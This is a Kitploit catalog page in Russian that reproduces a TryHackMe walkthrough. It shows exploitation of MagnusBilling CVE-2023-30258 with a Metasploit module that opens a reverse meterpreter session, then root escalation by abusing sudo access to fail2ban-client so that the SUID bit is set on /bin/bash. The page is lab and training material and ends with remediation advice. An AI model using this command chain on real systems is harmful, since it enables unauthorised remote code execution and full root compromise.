Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
THM-MagnusBilling-CVE-2023-30258-Exploit — Пошаговое прохождение эксплуатации CVE-2023-30258 (MagnusBilling RCE) и повышения привилегий через неправильную конфигурацию fail2ban в лаборатории TryHackMe. Демонстрирует веб-перебор, эксплуатацию Metasploit и повышение привилегий в Linux. | Kitploit
Инструменты/GitHubGitHub/cyb3rk0ala/thm-magnusbilling-cve-2023-30258-exploit
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Лаборатории и Практика
GitHubcyb3rk0ala/thm-magnusbilling-cve-2023-30258-exploit

THM-MagnusBilling-CVE-2023-30258-Exploit

Пошаговое прохождение эксплуатации CVE-2023-30258 (MagnusBilling RCE) и повышения привилегий через неправильную конфигурацию fail2ban в лаборатории TryHackMe. Демонстрирует веб-перебор, эксплуатацию Metasploit и повышение привилегий в Linux.

Репозиторий
11 месяц назадЕщё не проверено

THM-MagnusBilling-CVE-2023-30258

⸻

🛡️ MagnusBilling RCE → Root (CVE-2023-30258)

📌 Обзор • Цель: 10.145.148.203 • Платформа: TryHackMe • Уязвимость: CVE-2023-30258 • Доступ: Неаутентифицированное удалённое выполнение кода (RCE) • Повышение привилегий: неверная конфигурация fail2ban • Итоговый доступ: Root

⸻

🔍 1. Разведка

Сканирование портов

rustscan -a 10.145.148.203

📊 Открытые порты

Порт Сервис 22 SSH 80 HTTP 3306 MySQL 5038 Asterisk Screenshot 2026-04-08 at 22 09 15

Наличие Asterisk намекает на VoIP/биллинговую систему.

⸻

🌐 2. Перебор веб-каталогов

Фаззинг каталогов

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c

📁 Результаты: • /archive • /assets • /lib • /tmp • /protected

Путь /mbilling определён как потенциальный вектор атаки. Screenshot 2026-04-08 at 22 06 08

⸻

🚨 3. Выявление уязвимости

CVE-2023-30258

MagnusBilling уязвим к: • Неаутентифицированному удалённому выполнению кода (RCE) • Инъекции команд • Полной компрометации системы

⸻

💣 4. Эксплуатация (Metasploit)

msfconsole

search CVE:2023-30258

use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

set RHOSTS 10.145.148.203 set LHOST tun0 set LPORT 4444 run Screenshot 2026-04-08 at 22 03 12 Screenshot 2026-04-08 at 22 03 39

⸻

🎯 Результат

meterpreter session opened

sysinfo

OS: Linux Debian User: asterisk

Screenshot 2026-04-08 at 22 04 03

⸻

🔐 5. Первоначальный доступ

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

whoami

asterisk

⸻

🏁 6. Флаг пользователя

cd /home/magnus cat user.txt

⸻

🔎 7. Повышение привилегий

Проверка sudo

sudo -l

(ALL) NOPASSWD: /usr/bin/fail2ban-client

Обнаружена критическая неверная конфигурация!

Screenshot 2026-04-08 at 22 22 42

⸻

💣 8. Эксплуатация Fail2Ban

Добавление вредоносного действия

sudo fail2ban-client set mbilling_login addaction evil

sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"

sudo fail2ban-client set mbilling_login banip 127.0.0.1

Screenshot 2026-04-08 at 22 05 14

⸻

🚀 9. Доступ root

/bin/bash -p

id

euid=0(root)

Изначально whoami возвращал asterisk. Использование bash -p повышает привилегии до root.

Screenshot 2026-04-08 at 22 05 40

⸻

👑 10. Флаг root

cat /root/root.txt

⸻

🧠 11. Ключевые выводы • Эксплуатация CVE обеспечила лёгкий первоначальный доступ • Перебор веб-каталогов критически важен (ffuf выявил /mbilling) • Неверно настроенный sudo может привести к полной компрометации системы • fail2ban можно использовать для повышения привилегий

⸻

🛡️ 12. Меры по устранению • Обновите MagnusBilling до последней версии • Удалите NOPASSWD из конфигурации sudo • Ограничьте доступ к fail2ban-client • Укрепите веб-приложения и конечные точки

⸻

💀 Заключение

Эта машина демонстрирует реалистичную цепочку атак:

Веб-RCE → Shell → Повышение привилегий → Root

Сочетание уязвимости и неверной конфигурации привело к полной компрометации системы.

Скачать инструмент